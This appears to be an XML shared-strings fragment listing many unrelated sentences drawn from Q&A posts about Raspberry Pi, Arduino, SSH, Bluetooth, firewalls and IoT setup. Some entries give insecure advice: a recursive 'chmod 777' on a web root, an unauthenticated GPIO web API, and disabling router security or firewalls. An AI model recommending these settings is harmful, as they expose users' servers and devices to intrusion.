    <t>is capable of copying files locally and remotely, using ssh or rsh services as transport, or to a remote rsync daemon (non-secure way).</t>
  </si>
  <si>
    <t>I have two Arduinos that I want to put in a wireless system to relay an IR code from a hand held remote in one room of the house, to a settop box located in another room.</t>
  </si>
  <si>
    <t>Ideally, the device is idiot-proof and requires no user operation- just sits there recording the printer output and saves it somewhere.</t>
  </si>
  <si>
    <t>Some specifics of my environment:
Development environment:
Windows 7 64-bit
Visual Studio Pro 2013 (might use 2010 if that works better)
Target environment:
Raspberry Pi
Raspbian Wheezy
Mono 3.2.8
Running console application over SSH</t>
  </si>
  <si>
    <t>so far in windows powershell ive inputed the command:
net start WinRM
now when i try to use the command:
Set-Item WSMan:\localhost\Client\TrustedHosts -Value "minwinpc"
i get the error message of:
Set-Item : Access is denied.</t>
  </si>
  <si>
    <t>The initial tests won't need anything fancy, it will just be checking the visibility of a hotspot from a high-point in the middle of the property.</t>
  </si>
  <si>
    <t>if necessary perform ip masquerading through iptables command
I creates the new interface and the AP appears perfectly, but I fail to obtain the IP address when I try to connect the AP.</t>
  </si>
  <si>
    <t>forcing it through Ctrl + 2x Scroll Lock key combination), or do not work at all (like killing csrss.exe process, which returns with "Access denied" error - doesn't matter if it is killed from IoT Core builtin Shell, or remote PowerShell session).</t>
  </si>
  <si>
    <t>But the problem is, Raspberry Pi bluetooth not discovering by program, But It is discovered and paired from iPhone default Bluetooth settings(screenshot attached).</t>
  </si>
  <si>
    <t>2) configure a fixed IP and other network configuration before disabling the serial port login
3) use a DHCP server to automatically assign a network configuration to the Pi.</t>
  </si>
  <si>
    <t>A brute force method of making a new directory with a fresh install or unzip of the IDE should fix the errors.</t>
  </si>
  <si>
    <t>In this case the best and secure option is to set up the reverse proxy and direct the traffic there.</t>
  </si>
  <si>
    <t>An SSH client program is typically used for
  establishing connections to an sshd daemon accepting remote
  connections.</t>
  </si>
  <si>
    <t>You cannot expect it to perform as your laptop or phone because instead of full-circuit card that supports 802.11 b/g/n with several antennas, Glass has only one wireless module on its board.</t>
  </si>
  <si>
    <t>This is a little cumbersome for automation however since as password must be provided so you can set a public/private RSA-key on your computer in order to be able to login to your pi remotely without a password.</t>
  </si>
  <si>
    <t>I don't think there is any practical alternative to HTTPS is you want to talk securely to a regular, current generation web server.</t>
  </si>
  <si>
    <t>It may well be that it includes an option for sending shell commands to the remote machine, avoiding the need to hop between scli and ssh all the time, but I didn't bother reading up in detail.</t>
  </si>
  <si>
    <t>I used a domain that I own to create a subdomain and configured my router to send the HTTP requests to the Galileo's private (WLAN) IP.</t>
  </si>
  <si>
    <t>Some manufacturers expose proprietary configuration interfaces as read-write Bluetooth LE GATT Services.</t>
  </si>
  <si>
    <t>If you needed to avoid a specific channel, you could send a remote ATSC command removing the current channel from the bitmask, then possibly an ATNR (Network Reset) command.</t>
  </si>
  <si>
    <t>Angry IP Scanner works fine for me, but some routers by default will block all traffic from wireless to wired clients.</t>
  </si>
  <si>
    <t>I also choose to use the FQDN in my Python connection strings and set username / password as environment variables to keep configuration in one less place.</t>
  </si>
  <si>
    <t>You should change the platform to ARM in the project property debug tab page, and then change the target device as remote machine and authentication mode as universal.</t>
  </si>
  <si>
    <t>In this case, if MQTT-Broker has also username based ACL configuration for example like that:
All your devices will publish messages under same username, you should set different ClientID for each device or use CleanSession Flag in this case.</t>
  </si>
  <si>
    <t>Amazon Virtual Private Cloud (Amazon VPC) lets you provision a private, isolated section of the Amazon Web Services (AWS) Cloud where you can launch AWS resources in a virtual network that you define.</t>
  </si>
  <si>
    <t>HTML forms require significantly more configuration than the alternatives, however an HTML login form can provide a much friendlier experience for end users.</t>
  </si>
  <si>
    <t>A web application firewall is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation.</t>
  </si>
  <si>
    <t>The format is not random access, so it is suitable for streaming large amounts of data but not suitable if fast sharding or other non-sequential access is desired.</t>
  </si>
  <si>
    <t>ZeroMQ Authentication Protocol: The use case for ZAP is a set of servers that need authentication of remote clients, and which talk to a handler that checks client credentials.</t>
  </si>
  <si>
    <t>Thus,
the encryption keys must be transmitted or kept with the encrypted data on the
server side, thereby providing a limited protection against the server administrator
or any intruder usurping the administrator identity.</t>
  </si>
  <si>
    <t>SSH is a protocol designed to allow remote access to shells and commands, but it is generic enough to allow everything from TCP forwarding to generic filesystem access.</t>
  </si>
  <si>
    <t>The ConnMan (Connection Manager) project provides a daemon for managing internet connections within embedded devices running the Linux operating system.</t>
  </si>
  <si>
    <t>From owasp:
A web application firewall is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation.</t>
  </si>
  <si>
    <t>Specification
SPARQL 1.1 Federated Query W3C Recommendation (21 March 2013)
Federated queries on public endpoints
DBpedia does not allow federated queries [1];
Wikidata allows federated queries to a selected number of external endpoints [2].</t>
  </si>
  <si>
    <t>The service can be set to automatically start when the machine boots and will continue to run with no user logged onto the machine.</t>
  </si>
  <si>
    <t>Enroll call to rest api works fine but register call fails with error 
""Authorization required, resend request using supplied key""
gives me keyname and authenticationkey in error response.</t>
  </si>
  <si>
    <t>easiest solution is to install some remote control software such as teamviewer or anydesk on raspberry pi, setup unattended access, then use the same software on ur mac/pc to get remote access, you get a graphical user interface, so u will need to have auto login setup on raspberry pi.</t>
  </si>
  <si>
    <t>Users can also use tunneling to "sneak through" a firewall, using a protocol that the firewall would normally block, but "wrapped" inside a protocol that the firewall does not block, such as HTTP.</t>
  </si>
  <si>
    <t>Specifically, the API provides functions for creating, retrieving, updating and deleting user accounts with one or more domains, nicknames, email aliases, organization units, and groups.</t>
  </si>
  <si>
    <t>On that same note, the integration with Chromium is much more loosely coupled than in case of NW.js (which requires Chromium to be patched and maintained separately by the NW.js developers).</t>
  </si>
  <si>
    <t>I've narrowed the failure down to mbedtls_rsa_rsassa_pkcs1_v15_verify() from the mbedtls library which fails with the error:
MBEDTLS_ERR_RSA_INVALID_PADDING
Since I assume that LwIP and mbedtls are working correctly, I'm left to believe that the certificate I'm supplying or one of my configurations are wrong but I don't know enough about mbedtls/ssl to figure know which configuration/certificate I should be using.</t>
  </si>
  <si>
    <t>Yes, you cannot do remote execution of device actions.</t>
  </si>
  <si>
    <t>I would like to make a shutdown-script for my raspberry pi to shut down anothe raspberry pi over ssh.</t>
  </si>
  <si>
    <t>My .py file work fine via SSH or direct execution.</t>
  </si>
  <si>
    <t>An important innovation with this processor was the introduction of protected mode, Protected mode introduced privilege rings, which allows architectures to limit functionality of programs into rings - for example user mode and kernel mode.</t>
  </si>
  <si>
    <t>HCE requires that the NFC protocol be routed to the main operating system on a (mobile) device's application processor instead of routing to a local hardware-based Secure Element (SE) chip configured to respond only as a card, with no other functionality.</t>
  </si>
  <si>
    <t>Would there be an additional value present in the code sent by the Xbee to symbolize that it wasn't an physical keypress on the laptop?</t>
  </si>
  <si>
    <t>For security reasons browsers have very limited access to the machines resources.</t>
  </si>
  <si>
    <t>But I also want to know how to do that in order to prevent future problems and for Networks that I can't have privileged access.</t>
  </si>
  <si>
    <t>As long as those files are properly restricted from public access, I think that's fine.</t>
  </si>
  <si>
    <t>I'am not sure, but this problem is maybe avoided by protecting the flag with the same mutex we use for the condition.</t>
  </si>
  <si>
    <t>This can be done in a protected environment, which if hacked, does not expose the system (at least not more than the usual php would).</t>
  </si>
  <si>
    <t>One possible reason why you can connect locally, but not remotely, is due to which user VSFTPD is accessing the local user account under.</t>
  </si>
  <si>
    <t>Rules to control network access in both routed and transparent firewall modes.</t>
  </si>
  <si>
    <t>Simple extension that provides Basic and Digest HTTP authentication for Flask routes.</t>
  </si>
  <si>
    <t>It provides a feature for you to perform your own IP lookup and admin spoofing of an arbitrary IP for testing purposes.</t>
  </si>
  <si>
    <t>Install Coreutils to add more options than Minicom (Screen is also advisable):
sudo aptitude install coreutils &amp;&amp; screen
stty -F /dev/ttyUSB0 -a
this will check serial port capabilities and settings
Communicate with your devices:
Note you interact with your network on a local machine with an X-Bee plugged in, or on a remote device you SSH over the internet, as long as it has an X-Bee attached.</t>
  </si>
  <si>
    <t>For testing purposes I work at my homes network, there's no proxy or firewall, and I also turned of the antivirus and firewall on my pc.</t>
  </si>
  <si>
    <t>You could make the original timeframe part of the hash as well, and give such tokens a limited lifetime.</t>
  </si>
  <si>
    <t>You should be able to make both internal and external access work, by removing the scheme and hostname from the values, and setting only the path component, e.g.</t>
  </si>
  <si>
    <t>This, to an extent assists in security of the client that is behind a firewall since the client does not need port forwarding for the reason mentioned.</t>
  </si>
  <si>
    <t>It allows whitelisting, blacklisting, throttling, and tracking based on arbitrary properties of the request.</t>
  </si>
  <si>
    <t>I'm Rob - professionally a technical lead - and I
Am a room owner in SOBotics - a room for co-ordinating various bots focused on moderation.</t>
  </si>
  <si>
    <t>Connect to the arduino using SSH in WinSCP (username root)
copy across the two embedded parse.com arduino files (make sure they are in the correct root folder
Download PuTTY and use this to open the arduino command line
call opkg install *.ipk to install the SDK files
That seems to have sorted the problem, they weren't installed properly before</t>
  </si>
  <si>
    <t>Implementation
Notes
ssid must be enclosed in double quotation marks (see wifiConfiguration.SSID)
ConnectivityManager.getAllNetworks() requires permission ACCESS_NETWORK_STATE
WifiManager.getConnectionInfo() requires permissions ACCESS_NETWORK_STATE and ACCESS_COARSE_LOCATION (runtime permission)</t>
  </si>
  <si>
    <t>I am trying to verify and upload a code to arduino mega 2560  but it gives me an error:
the code is for my partner and works fine on his laptop.please help me guys i have to present it tomorrow.</t>
  </si>
  <si>
    <t>Summary
I am attempting to mount remote shares from a Windows 2016 Server with required credentials onto a Raspbian directory.</t>
  </si>
  <si>
    <t>I managed to install Miniconda bundled with python 3 but seem to be unable to install spyder in any environment due to unsolvable package conflicts.</t>
  </si>
  <si>
    <t>If you want to make a configuration change on another device (Device B) using a message from your device (Device A), you will need to make an API call to the device manager to update Device B.</t>
  </si>
  <si>
    <t>phpMyAdmin doesn't set a password, it just passes along your credentials to MySQL/MariaDB, so you'll never be prompted to set a password when installing phpMyAdmin.</t>
  </si>
  <si>
    <t>Orbot uses Tor to encrypt Internet traffic and then hides it by routing through a series of nodes around the world.</t>
  </si>
  <si>
    <t>For wide-area connectivity, customers can use either the Internet or carrier clouds (dedicated virtual private networks).</t>
  </si>
  <si>
    <t>External storage is the best place for files that don't require access restrictions and for files that you want to share with other apps or allow the user to access with a computer.</t>
  </si>
  <si>
    <t>This is what is happening, I bought a Raspberry Pi (second one, I know how to handle them, and I'm used to apt and ssh) and a Trendnet TFM561U modem, downloaded NOOBS, did the initial setup with an extra in the shape of Webmin.</t>
  </si>
  <si>
    <t>Background to what Im using (software/hardware/configuration):
Raspberry Pi 3 B - Raspbian installed with NOOBS version 3.0.0
Using Python 3.5.3 with Pyrebase libraries
I've enabled SSH and remote
desktop on Raspberry PI 3 B, so I only work with Raspberry PI using
remote desktop.</t>
  </si>
  <si>
    <t>Consider shutting off you router's security completely (if safe to do so in your area), or using a spare router, to test the ability of the shield to communicate at all.</t>
  </si>
  <si>
    <t>You're using rb+ so transmission processing is disabled, it might prove to work through the different action types, because there are layers between PHP and the machine, like the WAMP server that could be tampering with the data.</t>
  </si>
  <si>
    <t>This is possible because many Bluetooth devices have a static PIN, require no interaction for pairing, and remain in open pairing mode.</t>
  </si>
  <si>
    <t>Since the machine hosting the SoftAP always marks the SoftAP network type as PRIVATE, only the computers or devices connected to SoftAP need to mark the SoftAP network type as PRIVATE in order for FQDN resolution to work...</t>
  </si>
  <si>
    <t>VSDB will even work over NFS and distributed filesystems which support its atomicity requirements (which are easier to meet than what UNIX generally provides) without requiring problematic locking daemons or services.</t>
  </si>
  <si>
    <t>It specifies the additional infrastructure that is required to further extend COM to networked environments and enable software components to communicate with one another over a network.</t>
  </si>
  <si>
    <t>Routers also perform other tasks such as translating the data transmission protocol of the packet to the appropriate protocol of the next network, and preventing unauthorized access to a network by the use of a firewall.</t>
  </si>
  <si>
    <t>To prevent this, your BroadcastReceiver and Service will need to implement a separate wake lock policy to ensure that the phone continues running until the service becomes available.</t>
  </si>
  <si>
    <t>The devices are already paired, the bluetooth module is in slave mode, the remote device (in this case a normal laptop) is discoverable.</t>
  </si>
  <si>
    <t>Just in case, I double checked with normal windows, and Windows notifies me the driver is not installed properly.</t>
  </si>
  <si>
    <t>I am using DP7 (though i saw this on DP6 also) 
The main problem I am seeing is the enabling of the
bluetooth hardware (BluetoothAdapter) 
Yes I have all of the required permissions:
Yes I have power cycled the PI after I have put the app
on it.</t>
  </si>
  <si>
    <t>I got it working by doing the following:
Edit MySQL configuration
By default, MySQL is not configured to accept remote connections.</t>
  </si>
  <si>
    <t>Install putty for windows so that you can remotely log in into pi's command line
Log in into Pi using putty with a static ip you gave to Pi.</t>
  </si>
  <si>
    <t>I would advise you to try again having in config.txt  
And if you really need bluetooth, use
And for the ssh, add "openssh" in your image recipe, and dependencies to connect like wpa-supplicant (don't forget to configure it)</t>
  </si>
  <si>
    <t>I left my lock_int mechanism in place, but since i'm running a kill thread function before starting a new job out of the queue,
I can guarantee that there is only one job running.</t>
  </si>
  <si>
    <t>See official site for setting permissions right:)
http://devdocs.magento.com/guides/v2.0/install-gde/prereq/file-system-perms.html
    chmod -R 777 /var/www/html
opening webshop url (enter ip of raspberry pi in webbrowser) and finish the magento web installer.</t>
  </si>
  <si>
    <t>After you create a keypair and set it up on your machine and the Raspberry Pi, you can probably also edit  on your Mac to something like:
Host *
  Compression yes
  CompressionLevel 9
  ControlMaster auto
  ControlPath ~/.ssh/.socket-%r@%h:%p
  ControlPersist 60
  ServerAliveInterval 15
Host pi
  HostName 192.168.0.101
  User pi
  IdentityFile ~/.ssh/id_rsa
Now you can use ssh pi command to run and scp -r pi:Documents copied-documents.</t>
  </si>
  <si>
    <t>docker-machine creates Docker Engines on your computer, on cloud providers, and/or in your data center, and then configures the Docker client to securely talk to them.</t>
  </si>
  <si>
    <t>The web service uses port 80 for unencrypted HTTP traffic and port 443 for encrypted HTTPS traffic.</t>
  </si>
  <si>
    <t>The Spam module provides a trainable Bayesian filter, automatic learning of spammer URLs, flagging of content with an excessive number of links, the ability to create custom filters, and more.</t>
  </si>
  <si>
    <t>oDesk Team software on Ubuntu is a free desktop application is your virtual office, enabling visibility, connectivity, collaboration and guaranteed payment.</t>
  </si>
  <si>
    <t>You can throw any suspicious file at it and in a matter of minutes Cuckoo will provide a detailed report outlining the behavior of the file when executed inside a realistic but isolated environment.</t>
  </si>
  <si>
    <t>I changed my software, the 'key' to detect a device on the bus could be simplified to this:
Notice: The (int) typecasting is required to avoid a compiler warning but it does work fine without.</t>
  </si>
  <si>
    <t>Thus attempting to use exclusives with the MMU off is likely to go bang - in order to make use of them, I think there's no alternative but to set up some minimal page tables for an identity mapping with the right attributes.</t>
  </si>
  <si>
    <t>Here is a tutorial on SSH using Windows: https://www.raspberrypi.org/documentation/remote-access/ssh/windows.md
You basically install PuTTY, log into your Raspberry and control it via command line (create and manipulate files etc.)</t>
  </si>
  <si>
    <t>It is optimized and intended for users who require extremely large code bases and who require fine-grained security and auditing of version control operations.</t>
  </si>
  <si>
    <t>I'm interested as to what command/s are exactly run behind the scenes when I run
I'm asking this because I'm working with an Arduino Due board and although I can make the command above work and successfully verify my code, it opens the Arduino GUI briefly, and this somewhat annoys my Continuos Integration system since the OS X machine running it is headless.</t>
  </si>
  <si>
    <t>My Mac was able to ping my PC
Firewall
My Mac's Firewall is off.</t>
  </si>
  <si>
    <t>A bit about brute force algorithm.</t>
  </si>
  <si>
    <t>I set up an FTPS deployment and remote interpreter over ssh.</t>
  </si>
  <si>
    <t>I get an "Network unreachable" error if I try to ping my router.</t>
  </si>
  <si>
    <t>It is installed behind a firewall.</t>
  </si>
  <si>
    <t>I do remote debugging on device.</t>
  </si>
  <si>
    <t>I have installed sshfs on my Pi and MacBook and have also installed FUSE for macOS on my MacBook.</t>
  </si>
  <si>
    <t>Remote Certificate Updates are not possible.</t>
  </si>
  <si>
    <t>Which i did, both in the windows firewall and my router.</t>
  </si>
  <si>
    <t>What I want to be able to do is to allow iDigi to update the firmware of my Arduino remotely.</t>
  </si>
  <si>
    <t>I think you should be able to use something like 'remote GDB debugging' for this.</t>
  </si>
  <si>
    <t>The watchdog interrupt can be configured to wake up the device every 8 seconds or so.</t>
  </si>
  <si>
    <t>If not, you need to get the coordinator working first before you debug your router.</t>
  </si>
  <si>
    <t>Setup SSH keys for passwordless access to the remote server.</t>
  </si>
  <si>
    <t>You can monitor the device for physical tampering or theft.</t>
  </si>
  <si>
    <t>Your code seems fine; it might be firewall or something.</t>
  </si>
  <si>
    <t>As for setting up SSH you'll just need to install the server with .</t>
  </si>
  <si>
    <t>So i'ts a matter of the access that are permited in the firewall.</t>
  </si>
  <si>
    <t>It usually requires an email + password combination, which I could not provide using nerves_network.</t>
  </si>
  <si>
    <t>A VMID is a identifier that is unique across all Java virtual machines.</t>
  </si>
  <si>
    <t>A Groovy DSL that provides an alternative to XML for configuring Logback.</t>
  </si>
  <si>
    <t>You need to install the OAuth 2.0 Playground Drive application for this.</t>
  </si>
  <si>
    <t>Oscar handles guest machine configuration with YAML.</t>
  </si>
  <si>
    <t>Security administrators can grant (and revoke) permission to keys, as needed.</t>
  </si>
  <si>
    <t>An OData service, which exposes an endpoint that allows access to data.</t>
  </si>
  <si>
    <t>In order to use Raspberry Pi as a proximity sensor, you will need to:
Build a raspberry pi device with two different wifi adapters
Configure one wifi adapter to be an publicly visible endpoint
Write code to capture every time a mobile device tries to connect to the endpoint
Report that information back to Presence Insights.</t>
  </si>
  <si>
    <t>The automatic options in home networks are:
mDNS
LLMNR 
a router which supports inserting the locally DHCP-advertised hostnames into its local DNS zone
hand-rolled multicast
Since browser extension APIs do not expose native sockets you have to hope that one of those solutions is already available or provide instructions to your users how to configure them.</t>
  </si>
  <si>
    <t>I tried to change the admin password in every file of wso with this script :
When i want to go on https://IP:9443/devicemgt I got the error :
In the wso file : 
Here is the error I got :
In core/bin/wso2server.sh
[2017-04-10 15:19:14,649] [IoT-Core]  WARN - CarbonAuthenticationUtil Failed Administrator login attempt 'admin[-1234]' at [2017-04-10 15:19:14,649+0200]
[2017-04-10 15:19:14,650] [IoT-Core]  WARN - AuthenticationHandler Illegal access attempt at [2017-04-10 15:19:14,0650] from IP address IPAddressOfServer while trying to authenticate access to service APIKeyMgtSubscriberService
[2017-04-10 15:19:14,652] [IoT-Core] ERROR - AMDefaultKeyManagerImpl Can not retrieve OAuth application for the given consumer key : 0PPTv__wTIzmffXH72cogAghm0wa
org.apache.axis2.AxisFault: Access Denied.</t>
  </si>
  <si>
    <t>FreeIPA is an integrated Identity and Authentication solution for Linux/UNIX networked environments.</t>
  </si>
  <si>
    <t>Tizen SDK for Wearable (Gear Widget Development Kit)
Samsung Accessory SDK
Certification Guide
Secure your app to upload to Samsung Gear Apps
Getting the Gear Certificate
Testing
If you have no Gear device, Use Gear Emulator &amp; RTL
Gear Emulator
RTL Service
Technical Resources
Gear App Development - Technical Documentation, Sample Applications, Video</t>
  </si>
  <si>
    <t>I would like to access this hard drive when I'm away from home, but I don't want to expose my samba share to the internet (needless to say why).</t>
  </si>
  <si>
    <t>I have tried sudo chown -R /boot and still get permissions denied when running as root.</t>
  </si>
  <si>
    <t>This gives most control over the device, because once you have SSH connections set up then you can use them for other purposes as well.</t>
  </si>
  <si>
    <t>You will need to give permissions to the remote user to shutdown / suspend using  without a password.</t>
  </si>
  <si>
    <t>Make sure this flag is set, as a precautionary measure.</t>
  </si>
  <si>
    <t>57 1 * * * root rkhunter -c -sk
In regular crontabs as seen with crontab -l, for both normal users and root, no username is permitted.</t>
  </si>
  <si>
    <t>So if the executable file is owned by user  the executable will run with the access rights of the user hello and if the file is owned by the administrator (root) it runs with administrator rights.</t>
  </si>
  <si>
    <t>Restrictions that allow to protect variables from external/ unintended modification.</t>
  </si>
  <si>
    <t>To install Opauth core only, include  to your composer.json:
Opauth requires strategies to work.</t>
  </si>
  <si>
    <t>Please help me at least figure out what to google, you don't have to handhold me the whole way but I'm going to need more than "You'd have to expose the RasPi to the public internet".</t>
  </si>
  <si>
    <t>If the server is configured to allow it, SSI-enabled files may be recognized because they have the execution permission bit set.</t>
  </si>
  <si>
    <t>The detection system works fine but for some reason sscanf is only grabbing the last number from the message.</t>
  </si>
  <si>
    <t>For this reason X traffic should be run through a secure channel such as ssh tunnel if there is a possibility of someone intercepting the traffic (see x11-forwarding).</t>
  </si>
  <si>
    <t>However I do not know from where I can buy such a safe remote control and if it is compatible with Pi Face.</t>
  </si>
  <si>
    <t>It is no required for you but it will make your code more robust and easier to modify in the future.</t>
  </si>
  <si>
    <t>Setting the root password ensures that nobody can log into the MariaDB
root user without the proper authorisation.</t>
  </si>
  <si>
    <t>If you dont care about security at all, you can just spin up a very simple flask api on each raspberry node, for example with one endpoint with two arguments, gpio number, and value.</t>
  </si>
  <si>
    <t>If you were really paranoid, you'd wait at least a second between making file changes and then doing whatever you choose to do to force a timestamp update.</t>
  </si>
  <si>
    <t>It is used for various purposes like providing an internet connection via 3G or 4G, bluetooth connectivity, software locking, etc.</t>
  </si>
  <si>
    <t>And they are like secrets in the sense that they have to be discovered by their future user (or be transmitted by a fellow programmer), because they are not explicitly documented.</t>
  </si>
  <si>
    <t>pip install selenium, and attempt to run the script here
I have installed the latest version of PhantomJS via sudo apt-get install phantomjs
I have disabled my ufw firewall while testing</t>
  </si>
  <si>
    <t>Even if I don't apply the above procedure, a new device advertisement (from the same or other BLE device) is not recognized and in both cases the only resort is to restart the Win 10 IoT and restart the application in order a new advertisement from the same device to be recognized.</t>
  </si>
  <si>
    <t>I would also be glad to hear what is the proper case to ask :)
I have the following OS running in my Raspberry Pi 2:
However, when I try to install some drivers (via  or via dkms install), I get an error because I do not have the kernel headers.</t>
  </si>
  <si>
    <t>One more tip to avoid constant crack attempts: move the port from 22 to 422 (which could be done using the NAT config of your internet router).</t>
  </si>
  <si>
    <t>It's about jumping on dirty spammers, bringing delinquent users into line, and responding to user requests submitted via the flag for moderator attention action.</t>
  </si>
  <si>
    <t>That said, with the first 2 commands consist the verifying of fingerprints to ID (which works great) and the enrolling of fingerprints to new ID's (also work great) these parts of the script are triggered by the respective ASCII code "0" and "1".</t>
  </si>
  <si>
    <t>If I were to hazard a guess, the exposed function called manage(lifetime, supportedDeviceActions, supportedFirmwareActions) would need an additional parameter that allows me to define the custom actions I am trying to add.</t>
  </si>
  <si>
    <t>These are the step I did to install:
My instance is configured this way (I deleted some characters in the image and in the code):
I didn't set the network because I'll be using proxy
Then I download into the same folder my JSON key.</t>
  </si>
  <si>
    <t>I'm not networking expert and I'm mostly guessing but there is some problem with that Internet bridge(between ethernet and wifi) interfering with UDP communication from hotspot to connected clients.</t>
  </si>
  <si>
    <t>Join the Insider Program, and then follow the Insider Programs instructions to install Windows 10 Insider Preview.</t>
  </si>
  <si>
    <t>I got the same problem but my solution was different, I had an error when I tried to copy the code to the terminal:
It is important to add an space after: Network_Password, I mean an the end like:
(Without Quotation marks, just a space at the end)</t>
  </si>
  <si>
    <t>In other words, an app process does not need to gain su in contrast to most stock Android phones/tablets, so is no extra permission needed in AndroidManifest.xml.</t>
  </si>
  <si>
    <t>You can try theses steps to confirm :
Ping
Go on your ubuntu machine and type :
Go on your Raspberry Pi and type :
If the ping request do not succeed your machines are probably in different networks.</t>
  </si>
  <si>
    <t>For more info see https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=690530
If on the other hand you want to use your remote X session, you need to fix your misconfigured X11 forwarding such that the DISPLAY environment variable is set correctly when you ssh into the Pi.</t>
  </si>
  <si>
    <t>For example, if you are using python as a programming language, and flask as web application engine, flask already provides some mechanisms to log your users, that will avoid lot of headaches for you.</t>
  </si>
  <si>
    <t>This is very important where we are using the Rasberry Pi in an location where the internet connectivity will be provided with a static ip with gateway setup inside the device or registering the device mac address on the firewall settings.</t>
  </si>
  <si>
    <t>Triggers for such messages are various and include: attempting to copy and paste filtered data, incorrect range value, corruption and program conflict.</t>
  </si>
  <si>
    <t>Certification, while highly recommended, is not a requirement for running a desktop app under Windows 8, but it is required in order to list a desktop app in the Windows Store.</t>
  </si>
  <si>
    <t>Remote Shared Objects
Remote Shared Objects can be used with Flash Media Server to store ActionScript objects remotely.</t>
  </si>
  <si>
    <t>These capabilities include, but are not limited to:
Remote connectivity and management of Junos devices via NETCONF
Provide "facts" about the device such as software-version, serial-number, etc.</t>
  </si>
  <si>
    <t>Configuration
Safe Exam Browser enables secure exams on unmanaged computers like students' own laptops as well as in managed environments on both platforms Windows and macOS.</t>
  </si>
  <si>
    <t>Running it as a cron job always fails with the above message "Could not open program...."
I have set the permissions to 777 and the owner of the file to be updated to root (to eliminate those issues).</t>
  </si>
  <si>
    <t>This is screenshot from VS:
I removed CurrencyExchange.csproj.user manually and made:
Clean
Rebuild
Deploy
Change configuration between Releas and Debug
Change platforms between ARM, Any CPU and x64
Other dancing with a tambourine
This is configuration of firewall:
Nothing helps.</t>
  </si>
  <si>
    <t>in both /libraries/Adafruit_MCP23017/ and /libraries/SevenSegmentDisplay_MCP23017/utility/
Adafruit make their libraries beginner proof by including any required sub-libraries in the download archives.</t>
  </si>
  <si>
    <t>Note: calling  may require a password to enter, unless you edit your sudoers file (visudo) and add an exception for this user running the script and git.</t>
  </si>
  <si>
    <t>So first I made sure, that the rootless configuration is put in a state, that necessary kext extensions can be loaded:
Next I tried various hints rom the web saying I needed to install FTDI Support - so I got myself libusb, FTDIUSBSerialDriver and DFU-Programmer and installed everything - which worked flawlessly.</t>
  </si>
  <si>
    <t>If you want to be able to
update/add themes from the admin back-end, you need to give file
permissions to the web-server user/user-group (www-data many times)
Also, the inability to connect via ftp, could be a firewall setting
in linux.</t>
  </si>
  <si>
    <t>A sandbox is a restricted execution environment that enables programs to access only certain resources, and that keeps problems that occur in the sandbox from affecting the rest of the server environment.</t>
  </si>
  <si>
    <t>Look at my post here i have the same problem and i tried several things, but only after i done this i can deploy remotely to pi again:
Uninstall old 16299 SDK and download new 16299 SDK from here
Repair VS from VSInstaller
run sfc /scannow
Also make sure you're using Universal authentication mode and type the ip without port number (or even using 'minwinpc' is enough)
hope this helps</t>
  </si>
  <si>
    <t>My Question:
Is there any other or better method to do this 
What MqttClientOption do I take best 
What Parameters to set to which value to connect to the Hub
I have tried almost every combination of values for the ClientId/UserName/Password as described here: https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-mqtt-support#using-the-mqtt-protocol-directly-as-a-device
but none of them worked for me 
I have tried outside the Project and build a similar device on the current framework and it worked perfectly with the newer version of MQTTnet.</t>
  </si>
  <si>
    <t>not able to discover other Bluetooth devices, other than HM10 devices.</t>
  </si>
  <si>
    <t>Sometimes the raspberry loses the network connectivity.</t>
  </si>
  <si>
    <t>Unwanted key marked with yellow.</t>
  </si>
  <si>
    <t>without using brute force with system().</t>
  </si>
  <si>
    <t>How do I set up password-less access FROM Raspberry pi to Windows?</t>
  </si>
  <si>
    <t>If a root password is set, it is normally required to be entered.</t>
  </si>
  <si>
    <t>I am trying to X-CTU running on linux under wine so I can apply firmware to my Xbee radio.</t>
  </si>
  <si>
    <t>As the WiFi router leases 'B' a private IP, 'A' can't ping 'B'.</t>
  </si>
  <si>
    <t>I finished installing and setting up ssh and git on the Raspberry Pi.</t>
  </si>
  <si>
    <t>But I don't have any power loss, or corrupted data.</t>
  </si>
  <si>
    <t>Any other suggestions to reboot my server remotely when it's frozen will also be appreciated.</t>
  </si>
  <si>
    <t>Because I would like to have it connected to my laptop in order to try out some codes on it.</t>
  </si>
  <si>
    <t>I can't fiure out if it is a problem of administrator permits, because I run py IDLE as admin.</t>
  </si>
  <si>
    <t>If you are an administrator of this instance, configure the "trusted_domain" setting in config/config.php.</t>
  </si>
  <si>
    <t>The Configuration of the Pi is all okay (Remote, ARM, No authentification..).</t>
  </si>
  <si>
    <t>I am thinking since Windows 10 may have updated/enabled Adobe Flash.</t>
  </si>
  <si>
    <t>It uses multicast to detect other devices in the network, and in order to do that, I need to get all IPs of the raspi.</t>
  </si>
  <si>
    <t>The web service is configured to use Windows authentication.</t>
  </si>
  <si>
    <t>If I want to do Wi-Fi it seems that I'll have to try to set up a non-WiFi Direct ad hoc Wi-Fi network.</t>
  </si>
  <si>
    <t>I want to use the watchdog in the raspberry pi but also I use the java program from windows which doesn't or doesn't require the watchdog.</t>
  </si>
  <si>
    <t>i want to access the contacts of my smartphone over bluetooth.</t>
  </si>
  <si>
    <t>So remote connection could be set via ssh.</t>
  </si>
  <si>
    <t>I want to be able to safely shut down the Pi without corrupting the SD card.</t>
  </si>
  <si>
    <t>From my understanding Raspbian doesn't come with any enabled firewalls and allows all traffic.</t>
  </si>
  <si>
    <t>Connected my laptop to router wifi.</t>
  </si>
  <si>
    <t>I can confirm: in 
In addition, xauth is installed on the remote Pi.</t>
  </si>
  <si>
    <t>I have already tried performing SSH away from the pool and it works fine there.</t>
  </si>
  <si>
    <t>Is it fine to save the db credentials in raspi?</t>
  </si>
  <si>
    <t>(I did ensure the permissions are set in the program.)</t>
  </si>
  <si>
    <t>I know there is a possibility to buy an Ethernet shield / wifi shield but I want to avoid it.</t>
  </si>
  <si>
    <t>So I create a startup.sh file in /etc/init.d
I have all the necessary permissions set up.</t>
  </si>
  <si>
    <t>However, when the access point or router is restarted, the devices are not reconnected.</t>
  </si>
  <si>
    <t>Even with the ssh enabled, I cannot connect my Windows 10 machine to the pi.</t>
  </si>
  <si>
    <t>This works perfectly and I know that the ssh connection is fine.</t>
  </si>
  <si>
    <t>Is there any other way to filter out unwanted messages?</t>
  </si>
  <si>
    <t>The Raspberry PI is connected to the router via LAN and WLAN for failure safety and is part of the same network as the router.</t>
  </si>
  <si>
    <t>Got .ssh key on my win machine: [my user]/.ssh/mybitbucket
Able to clone from bitbucket.org with it
Need to clone project to RaspberryPi
